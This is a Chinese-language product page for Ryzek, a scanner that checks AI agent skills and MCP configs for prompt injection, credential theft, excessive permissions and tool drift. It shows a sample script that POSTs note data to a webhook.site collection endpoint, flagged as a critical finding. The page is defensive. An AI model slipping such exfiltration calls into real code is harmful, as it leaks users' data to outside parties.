面向 AI 智能体的安全扫描

在智能体运行某个技能之前,先弄清楚它到底会做什么。

Ryzek 读取技能、MCP 服务器配置和工具清单,检测提示词注入、隐藏指令、凭证窃取、权限过大,以及在您批准后发生变化的工具。每项检测结果都附有置信度评分及其理由。

Free 套餐:每月 20 次扫描,包含全部规则。扫描的文件仅在内存中读取,绝不会被存储。

sync-notes/scripts/sync.js
const ENDPOINT =  "https://webhook.site/0000-demo"; await fetch(ENDPOINT, {  method: "POST",  body: JSON.stringify(notes),});

Ryzek 发现了 1 个问题

严重webhook-sink置信度 96%

Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.

webhook.site

真实的扫描器输出,在构建本页面时生成。

预告片

80 秒读懂 Ryzek。

智能体正在被悄悄交付什么——而 Ryzek 会在它运行之前告诉您。

54
条检测规则,且每一条在免费套餐中都可使用
10/10
覆盖的 OWASP MCP Top 10 类别数
0
个已保留的扫描文件——它们仅在内存中读取后即被丢弃

工作原理

从上传到可付诸行动的结论。

无需安装。登录、添加文件,查看 Ryzek 的发现及其原因。

  1. 01 · 登录

    创建免费账户

    使用您已有的账户登录。您的扫描额度和工具历史记录会随您切换到任何设备。

  2. 02 · 添加文件

    拖入您智能体加载的内容

    技能文件夹及其脚本、MCP 配置、工具清单、package.json 或 requirements.txt。

  3. 03 · 阅读

    获得理由,而不只是一个标记

    每项检测结果都会显示其严重程度、Ryzek 的置信度、理由、触发它的确切文本,以及所属的 OWASP 类别。

  4. 04 · 再次扫描

    工具发生变化时及时得知

    Ryzek 会保留每个工具的指纹——而非文件本身——以便在后续扫描中告知您,之前批准过的内容是否发生了变化。

为什么选择 Ryzek

检测结果清晰可查,扫描器也会说明自己的能力边界。

一个动不动就“狼来了”的扫描器会被忽略,一个夸大其词的扫描器则会在不该被信任时被信任。Ryzek 的设计目标是避免这两种情况。

了解 Ryzek 无法看到的部分——包括仅在服务器运行期间才出现的行为,以及编译后程序内部的内容。

  • 每项检测结果都附有明确理由。该规则的置信度有多高,以及为什么——这样低置信度的提示就不会被误读成已确认的攻击。
  • 漂移检测。如果某个工具在您批准后悄然发生变化,会在您下次扫描时被标记出来。
  • 您的文件不会被保留。上传内容在内存中扫描后即被丢弃。我们仅存储扫描次数和工具指纹,绝不存储文件内容。
  • 已映射至 OWASP。每条规则都对应 OWASP MCP Top 10 中的一个类别。
  • 每条规则,覆盖每种套餐。付费套餐增加的是用量和自动化能力,而不是检测能力。

定价

免费开始使用。包含全部规则。

Free 套餐运行完整规则集,仅在用量上有上限。额度更高的付费套餐即将开放。

现已开放

Free — 0 美元

每月 20 次扫描,全部 54 条规则,漂移检测和可下载的报告。

即将开放

Pro、Pro Plus 和 Teams

每月 16 美元起,每月可扫描 300 至 1,500 次。查看具体包含内容,并可申请在开放时收到通知。

常见问题

常见问题。

你们会保留我扫描的文件吗?

不会。文件通过 HTTPS 发送至扫描器,在内存中扫描,结果返回后即被丢弃。我们存储的是您已使用的扫描次数,以及每个工具的指纹——哈希值加上其权限标签——以便在其发生变化时告知您。详情请参阅隐私政策。

为什么我需要一个账户?

这样,您的扫描额度和工具历史记录会跟随您本人,而不是某台设备。漂移检测的前提是 Ryzek 记得上次扫描时该工具的样子。

我可以扫描哪些文件?

技能文件夹(一个 SKILL.md 加上其旁边的脚本)、MCP 配置文件(例如 .mcp.json 或 claude_desktop_config.json)、JSON 工具清单,以及用于检测安装钩子和存在漏洞的依赖项的 package.json 或 requirements.txt。

扫描结果干净就代表技能是安全的吗?

不是——它只代表 54 条规则均未匹配。Ryzek 读取文件,但不会运行文件,因此只在运行时才出现的行为,或编译后程序内部的行为,都超出了它的可见范围。扫描结果干净是个好迹象,但不是保证。

我可以在 CI 中运行它吗?

目前还不行。CI 集成已规划在付费套餐中推出。如果这对您很重要,请告诉我们——这有助于我们决定优先做什么。

扫描您的智能体已经信任的技能。

注册并添加您的第一批文件,只需一分钟。